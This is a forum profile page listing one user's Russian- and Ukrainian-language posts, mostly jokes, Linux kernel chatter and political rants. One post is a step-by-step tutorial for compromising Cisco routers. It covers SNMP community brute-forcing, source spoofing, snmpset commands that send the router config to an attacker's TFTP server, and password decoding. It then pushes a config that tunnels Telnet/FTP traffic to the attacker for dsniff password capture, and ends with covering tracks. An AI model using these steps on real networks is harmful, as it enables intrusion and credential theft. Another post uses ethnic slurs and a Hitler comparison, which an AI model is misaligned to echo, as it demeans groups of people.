Перейти до змісту
  • Головна
  • vinladen

    Користувач
    • Постів

      313
    • Зареєстровано

    • Відвідування

    Весь контент vinladen

    1. Канечна - ведь известно что когда идёт пердёж - всем становитса трудно дышать, то есть когда запускаецца печатный станок - в стране становиццо больше денег, а если при этом не становиццо больше товара - возникает инфляция.Тимошенко - это как говорил Подеревянкси "привід у телевізорі" и таких женщин у власти нам не нужно! А каких нужно таких у нас ещё не напечятали. Мой идеал женщины-политика - М.Тетчер - баба-из-металла - это жесть и это рулит!
    2. Оце вже адназаначна рулить - російська мова - найкраща в світі, бо тільки росіяни можут так висловлюватись "ат переизбытка чувств" :biggrin:
    3. В процессе нахождения причины падения ядра 2.6.23-rc9, Линус Торвальдс обнаружил ошибку в компиляторе GCC 4.0.2. Линус очень подробно описал, из-за какой оптимизации возникли проблемы, и сказал, что эта оптимизация нелегальна. Алан Кокс поправил Линуса: "Если быть точным, некорректна. Практически, все оптимизации легальны, пока никто не издал законов о компиляторах." Линус ответил: "Хех. Когда я буду правителем вселенной, она *будет* нелегальной. Я просто забегаю вперёд." Когда у Линуса спросили, когда же он ожидает стать правителем вселенной, он ответил: "Я работаю над этим, работаю. Я надеюсь на это так же, как и вы. Похоже, это нетривиальная проблема."
    4. Сжатие. У тебя отрезают левую руку на входе, а на выходе пришивают клонированную правую (и зеркально повернутую, разумеется). То же с ногами и вообще со всем, что имеет регулярную структуру. Коррекция ошибок. К спине пришивают твою же фотографию. Если на выходе ты не похож - корректируют лицо. Время жизни пакета. Все перемещения по коридору - пока горит спичка. Hе успел - умри героем. DNS. Чтобы узнать, где колодец в деревне Гадюкино, ты сначала идешь к президенту, потом к губернатору и т. д. Динамический IP. Каждое утро все меняются паспортами. Текст-ориентированный протокол. Вместо тебя отправляют твой словесный портрет. MIME-код. Справка, что ты не верблюд. Уровни протоколов. Чистое поле. Hужно перейти от одного края к другому. Строится огромная арка, внутри арки мостовая, посреди мостовой кладут ж/д полотно, к рельсам приваривают сваи и на них ставят огромную гранитную глыбу с туннелем внутри, в туннеле прокладывают трубу диаметром полметра, по которой ты и ползешь, пока горит спичка, к президенту (сжатый и с коррекцией ошибок). Пинги. Иди, посмотри, Иван Петрович не ушел еще?. Маскарадинг. Один паспорт на всю семью. IPv6. Китайский паспорт. DHCP. Вы проснулись после дикой пьянки. Первые ваши слова - "кто я?" и "где я?". Сосед, который не запивал водку пивом, вам сообщает все ваши параметры: кто вы и где. Этот сосед выступает в роли DHCP-сервера. Учтите, что в сети могут быть так называемые "ложные DHCP-сервера", например, жена - на ваш вопрос "кто я?" она выдаст неверную информацию: "алкоголик ты проклятый". Так что не всегда динамическая выдача параметров безопасна, рекомендуется записывать свои параметры (как зовут, ваш адрес и т.д.) на бумажке. Маршрут по умолчанию. Подойдите к прохожему и спросите "не подскажите ли вы, как пройти к моргу имени Hевмировича-Данченко?". С большой долей вероятности вас пошлют. Так вот это и есть маршрут по умолчанию, другими словами, если адрес назначения не известен, то пакеты посылаются на маршрут по умолчанию (синонимы: шлюз по умолчанию, default gateway). Понятие TTL. Представьте себе, что вам 5 лет и вы хотите кушать. Вы идете к папе и говорите: "Папа, я хочу кушать". Ваш папа смотрит телевизор, согласно таблице маршрутизации, он посылает вас к маме. Вы идете к ней и просите "Мамааа, я хочу кушать". Мама болтает с подругой по телефону и, согласно своей таблице маршрутизации, посылает вас к папе. И так вы ходите, как дурак, от папы к маме и обратно, туда-сюда, туда-сюда, а все потому, что криворукие админы (папы и мамы) неправильно настроили таблицу маршрутизации. Чтобы защититься от таких ситуаций, придумали понятие TTL (Time To Live), что, применительно к нашей, ситуации означает количество терпения у мальчика, пока он не скажет "закол****<br />о" и не упадет перед ногами мамы или папы в беспомощном состоянии. Последний, по правилам (стандарты - это заведено в семье), обязан послать короткий нелестный отзыв в адрес того, кто послал мальчика кушать. Это так называемый icmp-пакет "мальчик исдох". Ентерит - воспаление пальца, возникающее при частом нажатии на клавишу "ENTER". Ping. Вы, конечно, бывали в ситуации "сам дурак". Вы кричите "Петя ты, дурак", а в ответ слышите "Вася, сам дурак". Это простейший пинг. Вы только что пропинговали Васю. Не все отвечают на пинги, особо культурные, например, Microsoft.com не утруждают себя реагированием на ваши запросы. С такими переругиваться бесполезно, мы знаем, что они слышат и злятся, но реакции добиться не можем. Тем не менее, пинг - неплохой способ узнать, жив ли хост, ведь, пиная труп ногами, не добьешься реакции "сам дурак". Traceroute. Представь себе, что ты живешь на 9-м этаже и хочешь узнать всех жильцов, которые живут от тебя до Клавки с 3-го. Ты берешь взрывпакет и, исходя из формулы свободного падения, рассчитываешь время взрыва пакета над 8-м этажем. Это TTL=1. После того как пакет **анёт - выглянет озверевшая рожа соседа с 8го этажа. Время реакции зависит от загруженности сервера, т.е. от занятости соседа и от шейпов, т.е. в воздухе ли ваша система или ты живешь на планете, где атмосфера - жидкий азот. Так вот, если вообще не дождешься ответа - твой сосед глухой - у него запрещены icmp-ответы, либо он запретил их только для тебя, если его уже достали твои финты и он научился тебя игнорировать. Дальше выставляешь TTL=2 и т.д. Не забывай, что если Клавка живет выше тебя - это No route to host .
    5. Хорошо живёт на свете у кого одна нога... --- Если вы считаете, что одна личность способна творить историю, поверьте мне - вам требуется срочное лечение от глупости. Каждый человек сам кузнец своего счастья и сам в ответе за свои действия, об этом кстати красноречиво говорит библия. Поэтому счтать что Шрек угробил целую нацию (а это ни много ни мало 48 миллионов человек) - необьективно. Посмотрим правде в глаза - всему виной менталитет (общий склад мышления) - ведь, как говаривал Петросян - какой народ, такие и депутаты (перефразировка Жозефа Деместра - каждый народ имеет то правительство, которое заслуживает).
    6. 1. Дед Мороз бородатый, жирный и смешно одевается (я не согласен). 2. Когда вы просите что-то у Деда Мороза, шансы получить это стремятся к нулю. 3. Дед Мороз редко отвечает на почту. 4. Когда вы спрашиваете Деда Мороза, где он берет все то, что у него есть, он отвечает: "Это чудо...". 5. Деда Мороза не волнуют сроки ваших проектов. 6. Ваши родители приписывали Деду Морозу сверхъестественные возможности, но делали все сами. 7. Никто не знает, перед кем Дед Мороз отвечает за свои действия. 8. Дед Мороз СЛИШКОМ много смеется. 9. Дед Мороз не стесняется врываться в ваш $HOME. 10. Только псих говорит плохо о Деде Морозе в его присутствие. 11. Дед Мороз вынужден делать всю работу, когда его пользователи отсутствуют. 12. Он вынужден работать даже в официальные выходные. 13. Он утверждает, что он уникален, но вы нередко встречаете таких же... 14. У пользователей невероятное число непомерных запросов, но, в конце концов, все что им нужно, это новые игрушки. 15. Как-то, где-то непонятным образом... он нашел жену такую же как он. 16. Там где люди в него не верят, обязательно есть тот, кто делает тоже самое, только зовут его иначе. 17. Людям недостаточно просто видеть результаты его работы. Они продолжают докучать вопросами, о том, как ему удается это сделать. Их не устраивает ответ, что это волшебство. 18. Даже неверующие молятся, что бы он пришел. 19. Он единственный, кто смеется над собственными шутками. 20. Он никогда не найдет другую работу; его резюме слишком специфично. 21. Чтобы делать свою работу, он вынужден карабкаться в узкие и грязные места... даже если он одет в хороший костюм. 22. И последнее... даже если его работа в основном нематериальна, мир становится лучше благодаря его присутствию.
    7. Уважаемый Г-жа ® / г-н Эндрю уже с электронной почте от 16.04.2008, мы спрашивали вас, наши претензии в плане урегулирования в размере EUR 20,98 платить. К сожалению, мы до сих пор не нашли получения оплаты. Мы призываем Вас вновь в свой аккаунт в размере $ 20,98 на 15.05.2008 заплатить, иначе нам пришлось бы обратиться к Вам с дальнейшими расходами. Мы просим вас это письмо как не имеющие отношения к рассмотреть промежуточные, если платеж производится. Не следует ли нам 15.05.2008 до получения платежа вами или определить разъяснения вопроса, поэтому мы оставляем за собой дальнейшие юридические шаги в этом вопросе. По вопросам, я рад Вас есть какие-либо имеется. Искренне Ваш, Bouncer4You Джером Эванс (ответственен за качество перевода автоматический переводчик Google :dntknw00: )
    8. Сегодня маршрутизаторы фирмы Cisco Systems – это железная основа сети Интернет. Их стабильное функционирование является залогом работоспособности глобальной сети, и потому любая критическая ошибка в их прошивке может поставить под угрозу нормальную работу и связность особо важных сегментов интернета. Сейчас я расскажу о нескольких уязвимостях железной кошки, о которых ты просто обязан знать. «Бочки», или взлом маршрутизатора по SNMP К счастью (а может, к сожалению), в последнее время критических ошибок в операционной системе IOS стали находить все меньше, но количество багов в голове сетевых администраторов от этого не сокращается. На просторах Дикого-дикого Веба все еще можно встретить роутеры, доступ к которым осуществляется посредством Telnet и маршрутизаторы SNMP-community с именами public или private. Если использование для доступа к терминалу протокола Telnet - это еще половина беды, то применение простых и часто встречающихся имен SNMP-community (да еще и без должной фильтрации) - это вообще полный белый пушистый зверек. SNMP-сервер маршрутизатора как раз и будет нашей главной целью атаки, вариантов которой может быть несколько. Первый вариант открыт для нас, если доступ к SNMP-агенту атакуемого маршрутизатора фильтруется плохо или не фильтруется вообще. В таком случае достаточно использовать перебор community-строк по словарю или брутфорсом. К счастью (или опять же к сожалению), SNMP-сервер не имеет понятия о том, что такое количество попыток и их лимит, потому перебор можно осуществлять сплошным потоком, используя различные утилиты. Конечно, лучше, если это будет самописный скрипт, но использование готового софта тоже вполне приемлемо. Например, можно заюзать тулзы из состава Solar Wind Engineers Toolset 9.0 – комплекта приложений для сетевых инженеров, в состав которого входят утилиты для брутфорсинга строк SNMP-community и атаки по словарю. Утилиту очень просто найти в пиринговых сетях, надеюсь, это не составит больших проблем (для тех, кто в танке: мы выложили эту утилиту на наш DVD). Второй вариант доступен нам, если SNMP-community задана распространенной (а значит, легко подбираемой) строкой, но доступ к SNMP-агенту надежно фильтруется в списках правил. Этот вариант мы рассмотрим подробнее, так как он представляет больший интерес и сложность в сравнении с первым. Конечно, здесь может иметь место еще более сложный вариант, состоящий из комбинации первого и второго способа, о котором мы еще поговорим. Итак, все же вернемся ко второму варианту. В качестве плацдарма для атаки будем использовать компьютер под управлением ОС Linux (в моем случае это Gentoo Linux 2007.0 с ядром 2.6.23). Для реализации атаки требуется наличие пакета net-snmp и iptables (я использовал версии пакетов 5.4 и 1.3.8 соответственно). Помимо всего прочего, в ядре должна быть включена полная трансляция сетевых адресов и отслеживание соединений в виде модулей iptable_nat, ip_conntrack и ip_tables, или в виде следующих опций в ядре, заданных при компиляции: CONFIG_NETFILTER=y CONFIG_NF_CONNTRACK_ENABLED=y CONFIG_NF_CONNTRACK=y CONFIG_NF_CONNTRACK_IPV4=y CONFIG_IP_NF_IPTABLES=y CONFIG_NF_NAT=y CONFIG_NF_NAT_NEEDED=y После установки всех требуемых пакетов и, при необходимости, пересборки ядра первым делом нужно добавить правило iptables, которое будет выполнять преобразование сетевых адресов (в нашем случае их подмену). В правиле необходимо указать, что адрес источника всех пакетов, направляющихся по протоколу UDP к SNMP-агенту маршрутизатора (работающего на 161-м UDP-порту), надо заменить адресом того хоста, который может беспрепятственно использовать SNMP-менеджер для управления и сбора статистики (читай: админский адрес). Подобная запись выглядит следующим образом: iptables -t nat -A POSTROUTING -p udp --dst 10.10.100.200 --dport 161 -j SNAT --to-source 192.168.0.137 Здесь ‘—dst’ — адрес атакуемого маршрутизатора, ‘--to-source’ — адрес доверенного хоста, который имеет доступ к SNMP-агенту. Для полной уверенности в корректности функционирования такой команды рекомендую сделать пробный дамп tcpdump'ом и посмотреть адреса назначения. Скорее всего, у тебя, мой уважаемый читатель, сразу возник вопрос о том, как мы будем получать ответы от SNMP-сервера маршрутизатора (агента). Ответ – никак. Нам это и не требуется. Единственный минус такого расклада – мы не сможем контролировать правильность выполнения команд и быть абсолютно уверенными в том, что мы все делаем правильно: ответы будут уходить доверенному адресу, а мы будет получать тайм-ауты запросов, однако маршрутизатор при правильно составленных запросах покорно выполнит все, что от него требуется. На самом деле это очень похоже на то, как мы нередко ночью добираемся до холодильника на кухне: хоть глаза ничего и не видят, дорогу мы знаем прекрасно и всегда можем найти пункт назначения . Такая покорность маршрутизатора обусловлена, как ты догадался, принципом работы протокола UDP, ведь соединение по UDP на транспортном уровне не устанавливается, и мы спокойно может передавать данные, не беспокоясь за их доставку и не получая уведомления о ней. Естественно, как и в любой другой системе, крупная добыча (хотя и не являющаяся главной целью) - это конфигурационные файлы. Операционная система маршрутизаторов Cisco IOS не исключение, здесь этими конфигурационными файлами могу быть running-config и startup-config, главное отличие которых понятно из названия, но разницы между ними в полностью настроенном и автономно функционирующем маршрутизаторе чаще всего нет. Этот конфигурационный файл, описывающий все настройки роутера, и будет нашей главной целью при атаке на SNMP-community, доступной на запись. Получить конфиг можно несколькими способами, но те из них, которые являются автономными, мы рассматривать не будем. По сети конфигурационный файл может быть получен по протоколам FTP, TFTP или RSCP. В своем примере я буду использовать протокол TFTP для простоты, в качестве TFTPd заюзаем демон atftpd (я задействовал версию atftp 0.7, хотя вместо нее с таким же успехом под Windows мог бы быть заюзан TFTP-сервер из состава SolarWinds Engineers Toolset). Спионеренный конфиг будет сохраняться в дефолтной папке tftpd - /tftpboot. Что до таблиц SNMP-MIB, то нас будет интересовать раздел CISCO-CONFIG-COPY-MIB, который доступен в Cisco IOS начиная с 12-й ветки, заменив собой устаревшую секцию OLD-CISCO-SYSTEM-MIB. Укажем, что для передачи данных используем TFTP-протокол: snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 integer 1 В качестве целого числа задается протокол 1 для TFTP, 2 для FTP и 3 для RSCP. Число 666 выбрано случайно и идентифицирует ячейку, в которую мы записываем нашу составную команду для копирования. <device name> - имя целевого маршрутизатора или IP-адрес. В моем случае это 172.22.2.1. Собственно, строка «1.3.6.1.4.1.9.9.96.1.1.1.1.» - это фиксированное значение OID из состава CISCO-CONFIG-COPY-MIB, отвечающее за копирование. Затем идет цифра, которая отвечает (чем заменить?) за составные части «команды копирования» (кавычки нужны?). Далее укажем, что хотим скопировать текущий используемый конфигурационный файл - running-config: snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 integer 4 Если указать после integer 1, то IOS будет пытаться копировать файл из сети, находящийся, например, на TFTP; если 2, то любой локальный файл, не являющийся конфигурационным; 3 (startup-config), 4 (running-config); и последний вариант 5 - стандартный терминальный вывод. Третьей командой указываем, что хотим скопировать файл по сети (ccCopyDestFileType INTEGER: networkFile): snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 integer 1 Варианты целочисленного параметра аналогичны предыдущей команде. Четвертой командой назначим адрес TFTP-сервера: snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 address <адрес TFTP-сервера>. В моем случае это 172.22.1.18. Далее зададим имя файла на TFTP-сервере: snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 string victim-config После того как команда составлена, можно запускать процесс копирования: snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 integer 1 Для запуска копирования можно указать параметр 1 или 4. Если бы у нас был доступ, то мы могли бы проверить, успешно ли выполнена команда: snmpwalk -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.10.666 Однако, как и в случае всех других команд, нам будет возвращен статус: Timeout: No Response from <device name>. Потому правильность выполнения команды мы будем проверять по наличию в папке /tftpboot файла victim-config приемлемого размера. Далее можно подчистить за собой следы — удалить ячейку 666 со всеми нашими командами: snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 integer 6 Ах да, чуть не забыл: естественно, в качестве community-строки private должно быть имя, заданное на маршрутизаторе. «Апельсины», или сливаем пароли через GRE-туннель Перейдем к следующему пункту наших действий — получению терминального доступа к консоли. В скачанном конфиге нас больше всего интересуют, как это ни банально, пароли. Паролей может быть несколько в разных вариациях: пароль на enable-режим (enable password 7 <пароль в виде открытого текста> или enable secret 5 <пароль в MD5>), пароль на терминальный доступ: ... ! line vty 0 15 password 7 <пароль в виде открытого текста> ... А также пароль и имя пользователя (username <имя пользователя> password 7 <пароль в виде открытого текста> или username <имя пользователя> secret 5 <пароль в MD5>). Кроме всего вышеназванного, вместо открытого текста в конфигурационном файле может присутствовать, например, такая строка: «password 7 06120A3258», где пароль закодирован в результате применения команды service password-encryption. Здесь 06120A3258 — не что иное, как пароль, отображенный открытым текстом - «test». Подобную кодировку назвать шифрованием тяжело, так как алгоритм ее кодирования давно известен и декодируется, например, утилитой Cain&Abel, хотя точно такие же возможности предоставляет Solar Wind Engineers Toolset в утилите Cisco Router Password Decryption. Возвращаясь к конфигурационному файлу атакуемого маршрутизатора, мы без труда найдем строки, отвечающие за конфигурацию паролей, и взломаем их перебором или по словарю в Cain либо просто декодируем их. Конечно, если пароль задан в MD5, то придется потратить значительное время. Итак, пароль получен! Однако радоваться еще рано, ведь доступ к виртуальному терминалу может быть ограничен списком доступа, например, так: ... ! access-list 10 permit 172.22.1.7 access-list 10 deny any ! ... line vty 0 4 access-class 10 in password 7 051F031C35 login ! ... В таком случае решения может быть как минимум два. Первое — попытаться обойти этот стандартный список доступа. Однако трюк, подобный тому, что мы провели с SNMP, здесь не прокатит по нескольким причинам. Как Telnet-, так и SSH-протоколы используют надежный транспортный протокол TCP, который непременно требует установки соединения с помощью трехэтапного рукопожатия SYN<->SYN/ACK<->ACK. Кроме того, ответные данные получать просто необходимо, иначе соединение теряет свой смысл. И все же решение этой проблемы есть, но доступно оно лишь в том случае, если атакующий находится в той же самой подсети, что и адреса, доступ которым разрешен по терминалу. Общий смысл сводится либо к простой смене адреса на интерфейсе атакующего, либо к спуфингу IP-адреса и/или MAC-адреса. Моей любимой утилитой, реализующей последнее, является sTerm от кодера MAO, создателя Cain&Abel. Скорее всего, разобраться с ней тебя не составит труда: все, что требуется сделать, — это задать желаемый IP-адрес и указать, требуется ли спуфить MAC-адрес источника. И все же добраться в нужный сегмент сети чаще всего не представляется возможным, поскольку находится он, в отличие от маршрутизаторов, в DMZ за корпоративным аппаратным файрволом на основе, например, Cisco PIX. Конечно, это устройство тоже подвержено некоторым уязвимостям, но это повод для отдельной статьи. Итак, допустим, мы находимся за много километров и хопов от атакуемого маршрутизатора, и наша конечная цель — пачками в благородных целях (для коллекции) собрать пароли пользователей, трафик которых проходит через тот самый маршрутизатор. Тогда мы выберем другую тактику и снова обратимся к SNMP. Все, что потребуется изменить в предыдущем сценарии, — это поменять местами источник копирования и назначения, предварительно изменив конфигурационный файл на нашем TFTP. Этот способ также применим, если нам не удалось/не хватило мощности или времени/лениво подобрать пароль. Идея нашей атаки заключается в создании туннеля между атакующим и атакуемым роутером для заворачивания трафика от маршрутизатора к атакующему и последующего его возврата на роутер. Если ты знаком с базовыми принципами маршрутизации, то должен прекрасно понимать, что туннель необходим, чтобы адрес следующего пункта назначения находился в той же подсети, что и один из интерфейсов маршрутизатора, через который будет проходить тот самый трафик. В нашем случае это будет самый распространенный интерфейс-туннель, используемый на Cisco роутерах, — GRE. Открываем любимый текстовый редактор (позор, если это не vim или emacs) и приступаем к редактированию: .. ! interface Tunnel0 ip address 10.0.0.1 255.255.255.252 tunnel source 172.22.2.1 tunnel destination 172.22.1.18 ! interface Ethernet0/0 ip address 172.22.2.1 255.255.255.128 ip policy route-map sniff-traffic ! interface Ethernet0/1 ip address 192.168.0.2 255.255.255.252 ip policy route-map sniff-traffic ! ... ! access-list 101 permit tcp any any eq telnet access-list 101 permit tcp any any eq ftp access-list 101 permit tcp any eq telnet any access-list 101 permit tcp any eq ftp any ... route-map sniff-traffic permit 10 match ip address 101 set ip next-hop 10.0.0.2 ! ... Первым делом мы создаем новый интерфейс — Tunnel0. По умолчанию он имеет тип IP/GRE. В качестве источника зададим один из адресов существующих интерфейсов маршрутизатора, участвующих в процессе форвардинга трафика, а в качестве адреса назначения — адрес атакующего. В моем примере это 172.22.1.18. Далее создаем расширенный список доступа, который может фильтровать трафик, в отличие от стандартных ACL, не только по IP-адресу источника, и укажем, какие протоколы, точнее, порты служб, к которым направляется трафик, нас интересуют. Следующим шагом будет создание карты маршрута (route-map), в которой мы сообщаем, что хотим перенаправлять трафик, соответствующий критериям ACL 101, на адрес 10.0.0.2, который впоследствии назначим туннельному интерфейсу на машине атакующего. Ну и, наконец, применим карту маршрутов к интерфейсам с помощью политики IP: ip policy route-map sniff-traffic Все. Конфигурация готова, можно заливать ее обратно на маршрутизатор, как я описал это выше. Теперь перейдем к машине атакующего. Для наших целей нам понадобится модуль ядра ip_gre. Вот что сообщил modinfo об этом модуле в моей системе: filename: /lib/modules/2.6.23-gentoo-r1/kernel/net/ipv4/ip_gre.ko license: GPL depends: vermagic: 2.6.23-gentoo-r1 mod_unload 686 4KSTACKS Для загрузки модуля выполним: modprobe ip_gre И проверим успешность его загрузки с помощью команды: lsmod | grep ip_gre Если все прошло успешно, то самое время приступить к установке пакета iproute2 - набора программ для просмотра и манипуляции параметрами сетевых устройств, заменившего полный набор классических сетевых утилит *nix. С помощью него мы будем управлять нашим GRE-туннелем и маршрутизацией. Я использовал версию iproute2-ss070710, чего и тебе советую (на момент написания статьи она была последней). Туннель будет аналогичен тому, что мы создали на маршрутизаторе, с тем лишь отличием, что адреса источника и назначения поменяются местами: ip tunnel add Tunnel0 mode gre remote 172.22.2.1 local 172.22.1.18 Далее назначаем адреса туннелю: ip addr add 10.0.0.2/30 dev Tunnel0 И поднимаем линк: ip link set Tunnel0 up ip addr add 10.0.0.2/30 dev Tunnel0 Так как весь трафик нам необходимо возвращать на атакуемый маршрутизатор, то основным шлюзом будет для нас адрес 10.0.0.1. Чтобы не потерять связь с адресом 172.22.2.1, пропишем к нему отдельную маршрутизацию: ip route del default ip route add default via 10.0.0.1 ip route add 172.22.2.0/25 via 172.22.1.61 Естественно, чтобы была возможность перенаправлять трафик, необходимо такую опцию включить: echo '1' > /proc/sys/net/ipv4/ip_forward И проверить, все ли корректно настроено у нас в iptables для цепочки FORWARD. Теперь все готово для того, чтобы перенаправлять трафик и вытаскивать из него пароли чемоданами. В качестве парольного снифера я использую dsniff версии 2.4. Запустим его: dsniff -i Tunnel0 -w ./sniffed_passwords Через некоторое время файл sniffed_passwords начнет заполняться паролями от FTP и Telnet-сессий. Прочитать файл можно так: dsniff -r ./sniffed_passwords Злоключение Как говорил Остап Бендер, «грузите апельсины бочками». На этом все. Стоит отметить, что подобный сценарий уже был описан в статье Mati Aharoni, William M. Hidalgo «Cisco SNMP configuration attack with a GRE tunnel» на www.securityfocus.com еще в 2005 году. Однако способ, приведенный авторами, чрезвычайно неудобен, поскольку требует физического доступа к маршрутизатору у атакующего и имеет предрасположенность к страшным извращениям с tcpdump'ом. Естественно, Циску в ближайшем киоске не купишь, да и стоит самая простая модель немалых денег. Это первое. А второе — достать жирный канал, который смог бы переварить большой объем проходящего трафика, тоже будет проблематично. Ну и третье — скрытность. Понятно, что анонимный root-shell скроет следы атакующего, да и достать его очень просто (но не в соседнем киоске ). Всего наилучшего. Danger Внимание! Все действия взломщика противозаконны! Информация представлена исключительно с целью ознакомления! Ни автор, ни редакция за твои действия ответственности не несут! Все эксперименты по взлому проводились исключительно на тестовом стенде.
    9. де бравопорт, знаєш? навпроти є квазар мікро - ян на бровари - не самий поганий сц
    10. vinladen

      Сборка ядра

      гм. И то верно. Я заметил то же самое токо когда уже собрал ядро :biggrin: . Ниччо - это ж мой первый опыт сборки, раньше я токо под фряху керовал парадом. Интересно ты сказал по поводу стабильности 2.6.25 - у мну щя 2.6.17 - это нестабильная версия? Как же тогда моя бедная ось работает (кста работает жутко, особенно это касается killed proc`s - они никуда нек исчезают а висят себе в <desfunct>е до самого rebootа). Или это всё что open source так работает? Если да, тода я поторопился уйти из мира форточек в надежде найти что-нибудь СТАБИЛЬНОЕ. Впрочем код я уже править научился, достаточно сделать этот процесс немного осмыслённее и тода может быть и я смогу гордо причислить себя к банде developerов :beee0000:
    11. Або пора ставити новий Віндовз або новий Комп.
    12. Цураюся рідної мови, бо відчуваю у собі "ган#### кацапську кров". Дуже вже багато зараз розвилося "шароварників", які мріють про те, що коли усе ненависне москальске зникне з рідної країни, то тут одразу ж рай настане. Тоді люди стануть добрішими, представники влади чеснішими, а продавці в магазині - ввічливішими. Хоча, як казав пан Бендер "лёд тронулся", час покаже.
    13. vinladen

      Сборка ядра

      Кто-нибудь пытался прекрутить к своей системе новьё с kernel.org? Я вот столкнулся с такой проблемой, когда пришлось самостоятельно править код, "любезно предоставленный" разработчиками. Мой компилятор просто наотрез отказался воспринимать конструкции типа "struct XXX YYY[]"? которые мне пришлось вручную перерабатывать на код типа "struct XXX * YYY" и это проходило, хотя, на мой взгляд - оба варианта идентичны, но на первый мой несчястный gcc 4.0.2 матерился нещадно: "error: array type has incomplete element type". Впрочем я не специалист по написанию операционных систем, поэтому не могу с уверенностью сказать что те или иные баги при компиляции вызваны криворукостью системных программистов, однако некоторые моменты удивляют - к примеру, когда в коде использование структуры идёт раньше её описания. В любом случае я могу согласится что данный продукт ещё очень сырой и не предназначен для массового внедрения, однако если есть желающие повторить мой эксперимент - предоставляю некоторые сведения: платформа сборки asplinux 11.2, версию компилера я указал выше, ядро можно найти на ftp://ftp.kernel.org/pub/linux/kernel/v2....ux-2.6.9.tar.gz (кстати, заглянув туда недавно нашёл уже более новые версии, вплоть до 2.6.25 + целую кучу патчей, что говорит о том, что не только в мире Microsoft существует проблема "преждевременных родов" :smile: ).
    14. интернет для меня это чтото типа: --- google.com ping statistics --- 13908 packets transmitted, 7901 received, 43% packet loss, time 194523ms rtt min/avg/max/mdev = 154.131/304.968/2474.441/308.247 ms, pipe 170, ipg/ewma 13.987/158.046 ms его мало, но каждый полученный байт вдвое ценен)))
    15. :biggrin: интересно, зачем покупать кофемолку, если не умеешь молоть кофе? Это о том, что ты зря платишь 35 грн в месяц, если ты блондинка ))
    16. Life : ( корпорация - очень удобно когда твои разговоры кто-то оплачивает))
    17. Це є дуже вже "болюче", так зване "кацапське" питання, бо москалі з'їли усе наше сало і випили всю нашу горілку, а тепер хочуть й мову відняти. Приблизно так саме великий Фюрер колись давно завів тему щодо вирішення єврейського питання, бо євреї теж багато зробили, аби загубити рідну неньку Німеччину. І у 1992-94 роках у нас теж багато молодиків питали "катра гадзіна" і якщо чули відповідь на російській мові - кублом кидалися топтати ногами "кровопівця". Саме тому й постає питання - чому так багато уваги привертається саме до Росії, а не до Америки або Європи, де дурне ураїнське бидло ніяк не потрібно, окрім як "стратегічний партнер" щодо дешевого постачання природніх ресурсів і робочої сили та брудної помийної ями для зливу усіляких небезпечних відходів виробництва? Задайтеся цим питанням - адже де виникла ідея щодо розробки у зоні відчудження могильника для захоронення відпрацьованих твелів із ядерних реакторів багатьох промислових обьєктів - невже у Москві? А звідки везуть усіляки отруйні речовини, що містять у собі небезпечні канцерогени та інші "досягнення" прогресивного людства? А звідки виникли усі ти "сенси" та "хелікоптери" - невже теж русизми? Як каже Великий Геній нашого народу - це поперше.І по друге - у далекій Канаді живе багато населення, яке розмовляє англійською мовою і багато населення, що розмовляє французькою. Так історично склалося - тому там дві ці мови є державними. Також там живуть українці, із тих що так сильно люблять рідний ураїнський край що не дуже поспішають сюди повернутися із свого "вигнання" - це так звана діаспора, котра не жаліє ні часу ні грошей, аби встановлювати у далекій та вже давно чужій їм країні свій лад, так як вони його вбачають, і все заради рідної батьківщини. Саме вони пишуть для нас закони та друкують наші гроші, тобто вони тут, як кажуть, повністю створюють погоду. Але ж їхні небезпечні для нашого суспільства соціальні експерименти ніхто не вважає за зло - бо все це робиться із щірої любові. І саме в далекій та байдужій до української культури Канаді чомусь відкривають все нові українські школи, аби маленькі канадськи українці могли і далі подовжувати свою культуру та побут. І це не дратує тих канадців, яки розмовлять іншими мовами - там українців не примушують спілкуватися офіційною мовою, бо вони вважають, що якщо закон чимось ущимлює права людини - то є поганий закон і його треба скасувати. Хоча хто в Україні знає що таке права людини? Навряд (це стосовно тої ідеї чому ми бидло - бо ми безправні, як худоба). І по третє - знов процитую нашого пана Президента - любі друзі, розгорніть будь ласка своі паспорти та подивіться що там надруковано. Скількома мовами вам надається українське громадянство?
    18. Инфа. В инернете есть куча оч полезных сервисов, без которых уже тяжело представить быт современного человека. Одна только служба ICQ чего стоит. А ещё я с удовольствием копошусь в страничках Wikipedia - энциклопедии, а также, как и любой пользователь, залезший в Паутину, часто прибегаю к услугам поисковых машин - Google, Yandex и пр.
    19. Сталкивался. Многие линуксы плохо работают с бортовыми приборами.
    20. Или наоборот - просто крики и просто стоны. Женщина всегда кричит когда хочет чтобы её мачо шевелился - в сёлах так же само поступают наездники, крича своей лошади "но!", когда хотят чтобы она бежала вприпрыжку. Как говорится в старой рекламе - радоваться жизни можно тихо, и посему ваша партнёрша, испытывая оргазм, так сильно сжимает челюсти, что не орёт раззинув рот, а просто шипит сквозь зубы. Хотя я не пытаюсь спорить, ибо сколько людей - столько и оргазмов )))
    21. Андрей. 1979 г.р. от р.х. учусь работаю мечтаю. увлекаюсь и не стесняюсь, люблю говорить.
    22. Привычка - это отлить перед сном, любовь не может быть привычкой, если конечно это любовь...Любовь - это страдание, если она неразделена, любовь - это счастье, если она взаимна. Любовь - это... ОФФТОП :: Помечено автором как несоответствующее данной темеПолюбил Шарлотту Вертер, Пламя той любви не гасло; А Шарлотта лишь умела Резать хлеб и мазать масло. Он любил жену чужую, Добродетель грызла душу, Предпочел он всем богатствам Преданность супруги мужу. Чах и чах, глазея нежно, Парил страсть в котле печали, Пулю в лоб себе пустил он, Чтоб мозги не докучали. А Шарлотта, видя тело, В коем жизнь уже погасла, По привычке отдавала Руку хлебу, сердце - маслу.
